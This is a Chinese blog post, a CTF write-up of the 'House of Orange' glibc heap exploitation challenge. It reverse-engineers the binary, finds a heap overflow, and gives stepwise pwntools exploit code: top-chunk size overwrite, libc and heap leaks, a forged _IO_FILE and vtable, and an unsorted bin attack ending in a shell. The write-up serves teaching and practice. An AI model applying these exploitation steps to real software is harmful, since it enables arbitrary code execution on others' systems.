house of orange学习

最新推荐文章于 2023-02-24 17:37:50 发布
最新推荐文章于 2023-02-24 17:37:50 发布
阅读量221 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36495104/article/details/106594692
版权

安全检查

在这里插入图片描述

IDA查看

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  signed int chocie; // eax

  init_n();
  while ( 1 )
  {
    while ( 1 )
    {
      menue();
      chocie = read_buf();
      if ( chocie != 2 )
        break;
      show();
    }
    if ( chocie > 2 )
    {
      if ( chocie == 3 )
      {
        edit();
      }
      else
      {
        if ( chocie == 4 )
        {
          puts("give up");
          exit(0);
        }
LABEL_14:
        puts("Invalid choice");
      }
    }
    else
    {
      if ( chocie != 1 )
        goto LABEL_14;
      add();
    }
  }
}

add函数

int add()
{
  unsigned int size; // [rsp+8h] [rbp-18h]
  signed int size_4; // [rsp+Ch] [rbp-14h]
  void *house; // [rsp+10h] [rbp-10h]
  _DWORD *v4; // [rsp+18h] [rbp-8h]

  if ( house_count > 3u )
  {
    puts("Too many house");
    exit(1);
  }
  house = malloc(0x10uLL);
  printf("Length of name :");
  size = read_buf();
  if ( size > 0x1000 )
    size = 4096;
  *((_QWORD *)house + 1) = malloc(size);
  if ( !*((_QWORD *)house + 1) )
  {
    puts("Malloc error !!!");
    exit(1);
  }
  printf("Name :");
  read_name(*((void **)house + 1), size);
  v4 = calloc(1uLL, 8uLL);
  printf("Price of Orange:");
  *v4 = read_buf();
  print_color();
  printf("Color of Orange:");
  size_4 = read_buf();
  if ( size_4 != 0xDDAA && (size_4 <= 0 || size_4 > 7) )
  {
    puts("No such color");
    exit(1);
  }
  if ( size_4 == 0xDDAA )
    v4[1] = 0xDDAA;
  else
    v4[1] = size_4 + 30;
  *(_QWORD *)house = v4;
  host_ptr = house;
  ++house_count;
  return puts("Finish");
}

show函数

int add()
{
  char *v0; // rsi
  int result; // eax
  int v2; // eax

  if ( !host_ptr )
    return puts("No such house !");
  if ( *(_DWORD *)(*host_ptr + 4LL) == 0xDDAA )
  {
    printf("Name of house : %s\n", host_ptr[1]);
    printf("Price of orange : %d\n", *(unsigned int *)*host_ptr);
    v0 = qword_203080[rand() % 8];
    result = printf("\x1B[01;38;5;214m%s\x1B[0m\n");
  }
  else
  {
    if ( *(_DWORD *)(*host_ptr + 4LL) <= 30 || *(_DWORD *)(*host_ptr + 4LL) > 37 )
    {
      puts("Color corruption!");
      exit(1);
    }
    printf("Name of house : %s\n", host_ptr[1]);
    printf("Price of orange : %d\n", *(unsigned int *)*host_ptr);
    v2 = rand();
    result = printf("\x1B[%dm%s\x1B[0m\n", *(unsigned int *)(*host_ptr + 4LL), qword_203080[v2 % 8]);
  }
  return result;
}

edit函数

int edit()
{
  _DWORD *v1; // rbx
  unsigned int name_len; // [rsp+8h] [rbp-18h]
  signed int v3; // [rsp+Ch] [rbp-14h]

  if ( upgread_count > 2u )
    return puts("You can't upgrade more");
  if ( !host_ptr )
    return puts("No such house !");
  printf("Length of name :");
  name_len = read_buf();
  if ( name_len > 0x1000 )
    name_len = 4096;
  printf("Name:");
  read_name((void *)host_ptr[1], name_len);
  printf("Price of Orange: ");
  v1 = (_DWORD *)*host_ptr;
  *v1 = read_buf();
  print_color();
  printf("Color of Orange: ");
  v3 = read_buf();
  if ( v3 != 0xDDAA && (v3 <= 0 || v3 > 7) )
  {
    puts("No such color");
    exit(1);
  }
  if ( v3 == 0xDDAA )
    *(_DWORD *)(*host_ptr + 4LL) = 0xDDAA;
  else
    *(_DWORD *)(*host_ptr + 4LL) = v3 + 30;
  ++upgread_count;
  return puts("Finish");
}

总结

edit函数,存在堆溢出,在add时申请小于0x1000大小的house,在edit时可以输入大于0x1000的数字。
每次只能edit刚刚申请的house
没有free函数

调试分析

build第一个house,然后堆溢出修改top chunk的size为0xf81

build(0x30,'a'*8,123,1)
payload = 'a'*0x30 + p64(0) + p64(0x21) +'a'*16+ p64(0)+ p64(0xf81)
upgrade(len(payload),payload,123,2)

budild第二个house,触发sysmalloc中的_int_free

budild第二个house大小为0x1000>0xf81 ,触发sysmalloc中的_int_free,将top chunk放入unsorted bin中,此时top chunk的fd和bk指针均指向unsorted bin(av)

build(0x1000,'b',123,1)

build第三个house,泄露地址

build一个0x400大小的house,再给name字段分配空间时,会从上一步unsorted bin里的top chunk 中分割0x400大小的chunk 返还给我们。

#malloc largechunk to use old_top
#leak libc_base
build(0x400,'a'*8,123,1)
see()
p.recvuntil("a"*8)
libc_addr= u64(p.recv(6).ljust(8,'\x00'))
libc_base = libc_addr -0x3c5188
print "libc base address -->[%s]"%hex(libc_base)
#malloc largechunk again
#leak heap_base
upgrade(0x400,'a'*16,123,1)
see()
p.recvuntil('a'*16)
heap_addr= u64(p.recv(6).ljust(8,'\x00'))
heap_base = heap_addr - 0xe0
print "leak_heap -->[%s]"%hex(leak_heap)
print "heap_base -->[%s]"%hex(heap_base)
_IO_list_all =  libc_base +libc.symbols['_IO_list_all']
system = libc.symbols['system'] + libc_base

由于0x400输入largebin范围,而将chunk 放入largebin链表中的时候,该chunk的fdnextsize与bknextsize会填入本身的地址。借此同时泄露unsortedbin(av)与heap的地址,通过固定偏移,计算libc_base与heap_base。然后计算system地址和_IO_list_all地址,_IO_list_all指向了__IO_FILE结构体的链表。

....
victim->fd_nextsize = victim->bk_nextsize = victim;//将old_top的fd_nextsize和bk_nextsize都指向old_top本身//将old_top加入largebin链表中

构造fake __IO_FILE结构体

首先填充到top chunk分配largebin后的top chunk处

payload = 'a'*0x400
#填充分配个price字段的0x10大小的chunk
payload += p64(0) + p64(0x21) + 'a'*0x10

构造fake __IO_FILE结构体,top chunk 减去上面申请的large bin之后的top chunk的size字段设置为0x61,使bk指针=p64(_IO_list_all - 0x10),通过unsorted bin attack 使得IO_list_all=unsorted_chunks (av)=&unsortbin-0x10,距离smallbin[4]的偏移是0x60。IO_FILE偏移0x60的字段是struct _IO_marker *_markers,偏移0x68的字段是struct _IO_FILE *_chain。而这两个的值恰恰是old_top的起始地址。改为0x61是为了将old_top加入smallbin[4],而smallbin[4]的fd和bk指针恰好对应于IO_FILE结构体中的_markers和_chain字段。

#old_top_chunk=_IO_FILE
fake_file = '/bin/sh\x00' + p64(0x61)
fake_file += p64(0) + p64(_IO_list_all - 0x10)

然后bypass check

fake_file += p64(0) + p64(1)                   #
#bypass check
#_IO_FILE fp
#fp->_IO_write_base < fp->_IO_write_ptr (offset *(0x20)<*(0x28))
#fp->_mode<=0   (offset *(0xc8)<=0)
fake_file = fake_file.ljust(0xc0,'\x00')

libc.2.23.so中vtable_ptr的偏移为0xd8,所以payload填充到0xd8,然后vtable_ptr赋值为heap_base + 0x5f0,即payload += p64(0)*3地址处,然后将overflow函数(下标为3, 0,1,2,3)的地址覆盖为system函数的地址。

payload += fake_file
payload += p64(0)*3
#0xc0+0x18=0xd8
#_IO_jump_t *ptr_vtable
#file_adr+0xd8=&ptr_vtable
#vtable[3]=overflow_adr
#gdb.attach(p)
payload += p64(heap_base + 0x5f0)#ptr_vtable
payload += p64(0)*3#vtable
payload += p64(system)#vtable[3]
upgrade(0x800,payload,123,1)

上一步修改了top chunk的size为0x61,old top chunk就会链入到smallbin[4],同时,unsortbin.bk也被改写成了&IO_list_all-0x10,所以此时的victim->size=0,调用malloc函数再分配一个chunk,就会触发malloc_printerr异常,
在这里插入图片描述
触发异常后,系统会遍历IO_llist_all,最终调用 IO_overflow函数,而此时IO_overflow表项为system函数的地址

函数大致调用链
mallloc_printerr-> __libc_message—>abort->flush->_IO_flush_all_lock->_IO_OVERFLOW
而_IO_OVERFLOW最后会调用vtable表中的__overflow 函数
#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)

触发漏洞

p.recv()
p.sendline('1')
#malloc size<=2*SIZE_SZ
#malloc(0x10) -> malloc_printerr ->overflow(IO_list_all) ->system('/bin/sh')
p.interactive()

Ref

添加链接描述
添加链接描述
添加链接描述
添加链接描述

0xCCCC9090
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
the house of orange解析
小强的博客
11-24 2205
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
记录一次Aborted错误
展昭的博客
07-14 4372
C语言里的内存申请释放时的Aborted异常闪退
malloc崩溃
yunlianglinfeng的专栏
02-24 4348
malloc崩溃
深入分析glibc内存释放时的死锁bug
weixin_30216561的博客
09-14 382
  通常我们认为一旦内存写溢出,程序就很容易崩溃。所以服务器上通常会对一些重要进程做脚本保护,一旦崩溃立即重新拉起。  最近发现我们一个公共服务内存写溢出时程序没有崩溃,而是卡死了。  为了深入分析原因,我们仔细review了glibc的代码,并发现一个较为隐蔽的bug。  先来看这个卡死的程序堆栈(64位环境,下同): #0 0x00002b059302ac38 in _...
how2heap 深入学习(9)
CoLin的pwn小屋
04-17 869
how2heap 深入学习之 2.31的那些检查
house of banana .pdf
09-05
House of Banana:深入理解安全实践与堆利用技术》 在信息安全领域,攻击者不断寻找新的漏洞和利用手段,以突破系统防御。"House of Banana"是一种针对glibc库的新型堆利用技术,自glibc 2.28版本以来,由于其...
2.27 house of botcake例题附件
最新发布
05-31
2.27 house of botcake例题附件
house-of-leaves
07-04
你知道在House of Leaves 中, house这个词的每个实例都是蓝色的吗? 这是一个简单的 Chrome 扩展程序,可在 Internet 上执行此操作。 不多也不少。
house-of-sock
03-18
问题:在空车上显示的送货价格有问题:已将elif添加到代码中
system_of_house_measure.rar_house
09-21
房屋测量系统,集成了基本的地图软件要素。
libc死机问题二(free死机)
u011605208的专栏
09-16 2072
一、简介 c语言本身并没有对内存的管理,在标准并没有明确的给出行为规定 本文只讨论glibc下的情况 1)glibc库提供了有限的管理,在操作非法时,会触发abort信号,或者由操作系统触发segmentfault信号 2)当程序的代码量较大时,内存问题的查找极为艰难 二、glibc free死机的分类 1)glibc detected *** f
glibc下malloc与free的实现原理(四):tcache机制
weixin_44215692的博客
04-11 1156
glibc下malloc与free的实现原理(四): tcache 一、概述 tcache是glibc某个版本后引入的新机制,目的是提高堆管理的性能。 事实上,在我们现在用pwndbg调试与堆有关的程序时,就会发现许多free chunk被归入了tcache 许多漏洞的利用也和tcache机制有关,因此研究tcache的机制是有必要的。 我们先不论tcache机制到底是什么(按照字面意思,有“高速缓存”之意),先就从tcache相关的新增代码的分析入手,最后就能总结出tcache机制究竟是什么。 二、新的相
Linux下SegmentFault(double free)分析方法(四)coredump文件
码中飞翔
03-10 1271
Linux下SegmentFault(double free)分析方法(四)coredump文件 一、coredump简介 1、coredump文件是什么? core dump又叫核心转储, 当程序运行过程中发生异常, 程序异常退出时,由操作系统把程序当前的内存状况存储在一个core文件中, 叫core dump.(linux中如果内存越界会收到SIGSEGV信号,然后就会core dump)在程...
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1019
PWN技巧之_IO_FILE结构体利用house of orange
技巧:多共享动态库中同名对象重复析构问题的解决方法
yukin_xue的专栏
03-09 989
Linux 支持的共享程序库(lib*.so)技术不仅能够有效利用系统资源,而且还对程序设计带来了很大的便利性、通用性等,因此被各种级别的应用系统广泛采用。动态链接的共享库是在加载应用程序时被加载的,而且它与应用程序是在运行时绑定的:通过动态链接器,将动态共享库映射进应用程序的可执行内存中(动态链接);在启动应用程序时,动态装载器将所需的共享目标库映射到应用程序的内存(动态装载)。   在通常情
linux进阶23——GDB(九):gdb调试coredump
www_dong的博客
06-02 4006
1. coredump
关于如何理解Glibc堆管理器(Ⅸ——从源代码理解free)
Tokameine的博客
08-07 707
本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。 若有图片及文稿引用,将在本篇结尾处著名来源(也有置于篇首的情况)。 为了文章的可读性,笔者将使用“块引用”来表示分支情况,在没有特别标注的情况下(没有说明引用来源时),其中内容均为笔者所写 目录 源代码: __libc_free: 分支1:free(0) 分支2:该内存由mmap分配 分支3:否则 _int_free: 分支1:使用Tcache 分支2:符合Fast Bin...
PWN技巧之_IO_FILE文件结构体利用echo_from_your_heart
aptx4869_li的博客
02-15 705
PWN之_IO_FILE文件结构体利用echo from your heart
house price机器学习
06-07
好的,您想了解关于机器学习中的房价预测吗?房价预测是一个很常见的机器学习问题,它通常被称为回归问题。在这个问题中,我们需要根据一些特征(例如房子的面积、位置、卧室数量等)来预测房价。有许多机器学习算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值